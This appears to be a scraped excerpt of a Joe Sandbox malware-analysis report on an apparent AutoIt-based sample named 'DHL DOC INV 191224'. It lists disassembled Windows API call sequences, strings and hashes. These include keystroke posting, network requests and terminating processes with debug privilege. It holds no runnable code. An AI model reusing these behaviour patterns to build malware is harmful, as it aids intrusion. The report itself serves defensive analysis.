                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                        • Opcode ID: 36fbcd15a4042c74752b99d856bfd0f25aefa7a015b50762f8aeb36f15491a8d
                                                                                                                        • Instruction ID: 6c2145bdeead7718e51a84abba2150945bef5494e42ae324d084d3358f3a7efd
                                                                                                                        • Opcode Fuzzy Hash: 36fbcd15a4042c74752b99d856bfd0f25aefa7a015b50762f8aeb36f15491a8d
                                                                                                                        • Instruction Fuzzy Hash: 7961B171608321AFD712DF54C889FAAB7E8EF49718F004809F685DB691D770EE48CB92
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003A33CF
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A33F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 4099089115-3080491070
                                                                                                                        • Opcode ID: e8047c0041cb6342a952ec847ced85d83dab656304688ec4a055db36a2fc5ab9
                                                                                                                        • Instruction ID: 94d66acb8dfe47d23b566a440513900d68ccecd0b59de5942d836da1b91f7433
                                                                                                                        • Opcode Fuzzy Hash: e8047c0041cb6342a952ec847ced85d83dab656304688ec4a055db36a2fc5ab9
                                                                                                                        • Instruction Fuzzy Hash: 11518F72D00209AADF17EBA0CD86EEEB778EF05340F108166F5057A062EB716F58DB60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                        • API String ID: 1256254125-769500911
                                                                                                                        • Opcode ID: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                                                                                                                        • Instruction ID: 96d3b64e85b544d0daae8fc646399a6cb80f3c916a0e808293005defd1b34887
                                                                                                                        • Opcode Fuzzy Hash: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                                                                                                                        • Instruction Fuzzy Hash: 7D41F832A000279BCF116F7DDE915BEF7A5AFA0754B264229E461DB284E731ED81C790
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A53A0
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003A5416
                                                                                                                        • GetLastError.KERNEL32 ref: 003A5420
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003A54A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                                                                                                                        • Instruction ID: 2056a1371d0bfa673f0b16fafd0cc8533d71c99014063813e573572eb57ca595
                                                                                                                        • Opcode Fuzzy Hash: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                                                                                                                        • Instruction Fuzzy Hash: A631D335A00604DFC712DF6AC485EA97BB8EF1A305F188055E505CF652DB74ED82CB90
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0039B151
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B165
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0039B16C
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B17B
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039B18D
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1A6
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1B8
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1FD
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B212
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B21D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 8644f06fca59fc5928128aa42e70354a4fe2e3bd07fd519b71b5ac2dd2eae7ec
                                                                                                                        • Instruction ID: ea0823f9069c55081f8496f7f1a1952c4d5cb9b85a0064f450f72886f2e73844
                                                                                                                        • Opcode Fuzzy Hash: 8644f06fca59fc5928128aa42e70354a4fe2e3bd07fd519b71b5ac2dd2eae7ec
                                                                                                                        • Instruction Fuzzy Hash: F331EC71510204BFDF129F24EE48FAEBBADFB1031AF154428FA44E6190C7B4EA018F28
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00362C94
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 00362CA0
                                                                                                                        • _free.LIBCMT ref: 00362CAB
                                                                                                                        • _free.LIBCMT ref: 00362CB6
                                                                                                                        • _free.LIBCMT ref: 00362CC1
                                                                                                                        • _free.LIBCMT ref: 00362CCC
                                                                                                                        • _free.LIBCMT ref: 00362CD7
                                                                                                                        • _free.LIBCMT ref: 00362CE2
                                                                                                                        • _free.LIBCMT ref: 00362CED
                                                                                                                        • _free.LIBCMT ref: 00362CFB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                                                                                                                        • Instruction ID: 3b06803e0e14af01bb3303c2585da209a1c99ce02c6a4707cf5cadf7692a63c7
                                                                                                                        • Opcode Fuzzy Hash: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                                                                                                                        • Instruction Fuzzy Hash: 47119676600508AFCB07EF54D842CDE3BA5FF46390F4284A5F9485F226D731EA609B90
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00331459
                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 003314F8
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 003316DD
                                                                                                                        • DestroyWindow.USER32(?), ref: 003724B9
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0037251E
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0037254B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: e36288d6c72a43d24b78ccda977746be6fea4d7e914be7cbabe4f8e557de1b59
                                                                                                                        • Instruction ID: 4b768f951e3795bd90df95d18ca54036cf39d8376ed3f55238d0e5e88cec0a43
                                                                                                                        • Opcode Fuzzy Hash: e36288d6c72a43d24b78ccda977746be6fea4d7e914be7cbabe4f8e557de1b59
                                                                                                                        • Instruction Fuzzy Hash: D8D15A31701212CFDB2BEF15C899B2AF7A4BF05710F1582ADE84AAB251DB30AD52CF50
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00335C7A
  • Part of subcall function 00335D0A: GetClientRect.USER32(?,?), ref: 00335D30
  • Part of subcall function 00335D0A: GetWindowRect.USER32(?,?), ref: 00335D71
  • Part of subcall function 00335D0A: ScreenToClient.USER32(?,?), ref: 00335D99
• GetDC.USER32 ref: 003746F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00374708
• SelectObject.GDI32(00000000,00000000), ref: 00374716
• SelectObject.GDI32(00000000,00000000), ref: 0037472B
• ReleaseDC.USER32(?,00000000), ref: 00374733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003747C4
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
• Instruction ID: 50679cf20b9d83c47f550d744b8dce5c36f311a6f197887ffa9e055e8895cbf7
• Instruction Fuzzy Hash: 0671CF31400245DFCF378F64C984ABA7BB9FF4A314F198269E96A9A166C335A881DF50
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: 7b4e712ee4459d3624e83e4b81357478dced0e19715215c4ccbf99878685404e
• Instruction ID: 616e476da83c5d6205f365b904c93e44b61844531304d77c23df3905afc7c6f3
• Instruction Fuzzy Hash: EF518F72900209BBDF16EBA0CD82EEDBB78EF05310F148125F5057A1A1EB711A99DFA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C2EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C2EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 003C2EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C2F0B
Similarity
• API ID: LongWindow$MessageSend
• String ID: xV
• API String ID: 2178440468-2513823414
• Opcode ID: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
• Instruction ID: 1a6ec41be08c7b3831b184fbbf6028170ff563e8e7f63c8e68294ff1ab73d986
• Instruction Fuzzy Hash: 9D310330604254AFDB22DF68DD84FA637E5EB8A710F1A1168F944EF2B1CB71AC50DB41
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC2CA
• GetLastError.KERNEL32 ref: 003AC322
• SetEvent.KERNEL32(?), ref: 003AC336
• InternetCloseHandle.WININET(00000000), ref: 003AC341
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
• Instruction ID: 0dcb1599485d4e8ed1b3c741b4e68ff391984fc986a6e42a5a77ec6d00f078e0
• Instruction Fuzzy Hash: 98319FB5520204AFDB239F648C88EAB7BFCEB4A740F14A51EF44AD6640DB34ED059B60
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00373AAF,?,?,Bad directive syntax error,003CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003998BC
• LoadStringW.USER32(00000000,?,00373AAF,?), ref: 003998C3
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00399987
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
• Instruction ID: 42a86dfc067c3c54a7d03ea61ce84c158d1659c5e9059f88a98c2b74551bac8a
• Instruction Fuzzy Hash: 63212F3194021DABCF17AF90CC46EED7779FF18700F04945AF5156A0A1EB71AA18DB51
APIs
• GetParent.USER32 ref: 003920AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 003920C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0039214D
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
• Instruction ID: 810663421ba8956b222b796727817650dd32de253ea519d525e4fbe4e36f5108
• Instruction Fuzzy Hash: 85112976688B0ABAFE072620DC0BDF7779CDB14329F210016FB04E91E1FE616C655614
APIs
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
• Instruction ID: cc7e9303b79155c90e16e578a74a78baeb1aaf79681798ee472b03cda994e824
• Instruction Fuzzy Hash: E1614A71A04301AFDB27AFB49C41B7A7BA5EF06350F06C16DF984AF249D7329D0187A0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00386890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003868A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003868B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003868D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003868F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 00386901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0038691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 0038692D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268354404-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC182
• GetLastError.KERNEL32 ref: 003AC195
• SetEvent.KERNEL32(?), ref: 003AC1A9
  • Part of subcall function 003AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
  • Part of subcall function 003AC253: GetLastError.KERNEL32 ref: 003AC322
  • Part of subcall function 003AC253: SetEvent.KERNEL32(?), ref: 003AC336
  • Part of subcall function 003AC253: InternetCloseHandle.WININET(00000000), ref: 003AC341
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
APIs
  • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
  • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
  • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003925BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003925DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003925DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003925E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00392601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00392605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0039260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00392623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00392627
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00391449,?,?,00000000), ref: 0039180C
• HeapAlloc.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391828
• GetCurrentProcess.KERNEL32(?,00000000,?,00391449,?,?,00000000), ref: 00391830
• DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391833
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391843
• GetCurrentProcess.KERNEL32(00391449,00000000,?,00391449,?,?,00000000), ref: 0039184B
• DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 0039184E
• CreateThread.KERNEL32(00000000,00000000,00391874,00000000,00000000,00000000), ref: 00391868
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C6EE
• _wcslen.LIBCMT ref: 0039C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039C7CA
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: (V$(V$0
• API String ID: 1227352736-3922707423
APIs
  • Part of subcall function 0039D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
  • Part of subcall function 0039D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
  • Part of subcall function 0039D4DC: CloseHandle.KERNEL32(00000000), ref: 0039D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA16D
• GetLastError.KERNEL32 ref: 003BA180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 003BA268
• GetLastError.KERNEL32(00000000), ref: 003BA273
• CloseHandle.KERNEL32(00000000), ref: 003BA2C4
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C3925
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003C393A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C3954
• _wcslen.LIBCMT ref: 003C3999
• SendMessageW.USER32(?,00001057,00000000,?), ref: 003C39C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C39F4
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                        • String ID: SysListView32
                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                        • Opcode ID: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                                                                                                                        • Instruction ID: db07ba5dd6e9be34636e0de25a13e994670e54c9d709724978957ada5982eedb
                                                                                                                        • Opcode Fuzzy Hash: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                                                                                                                        • Instruction Fuzzy Hash: 3541D431A00318ABEF229F64CC45FEA7BA9FF08350F11452AF958E7291D7719E94CB90
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352D4B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00352D53
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352DE1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00352E0C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352E61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: &H5$csm
                                                                                                                        • API String ID: 1170836740-3207714950
                                                                                                                        • Opcode ID: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
                                                                                                                        • Instruction ID: 7303c40605d5e6402411e5a1fc2584b8fd825eed0015074bfee6c7471b105db0
                                                                                                                        • Opcode Fuzzy Hash: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
